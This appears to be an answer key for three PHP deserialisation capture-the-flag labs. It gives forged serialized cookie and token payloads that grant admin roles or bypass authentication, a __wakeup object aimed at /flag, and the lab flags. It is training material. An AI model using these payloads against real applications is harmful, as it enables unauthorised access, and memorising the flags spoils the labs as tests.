Lab 1 - PHP Object Injection via Cookie:
  The session_obj cookie is a base64-encoded serialized UserSession object.
  Decode it, modify role to "admin" and isAdmin to b:1, re-encode and set cookie.
  Payload: O:11:"UserSession":3:{s:8:"username";s:5:"admin";s:4:"role";s:5:"admin";s:7:"isAdmin";b:1;}
  Base64: TzoxMToiVXNlclNlc3Npb24iOjM6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6NDoicm9sZSI7czo1OiJhZG1pbiI7czo3OiJpc0FkbWluIjtiOjE7fQ==
  Flag: flag{deserialisation_php_object_injection}

Lab 2 - __wakeup Magic Method:
  Craft a Logger object with logFile = "/flag".
  Serialized: O:6:"Logger":2:{s:7:"logFile";s:5:"/flag";s:10:"logMessage";s:4:"pwnd";}
  Base64-encode and submit via the form. __wakeup fires on unserialize.
  Flag: flag{deserialisation_wakeup_magic_method}

Lab 3 - Auth Bypass via Deserialised Token:
  Decode the remember_token cookie. Modify isAuthenticated to b:1 and role to "admin".
  O:15:"RememberMeToken":4:{s:6:"userId";s:7:"user_42";s:4:"role";s:5:"admin";s:15:"isAuthenticated";b:1;s:7:"expires";s:10:"2025-12-31";}
  Re-encode to base64 and set as cookie.
  Flag: flag{deserialisation_auth_bypass_token}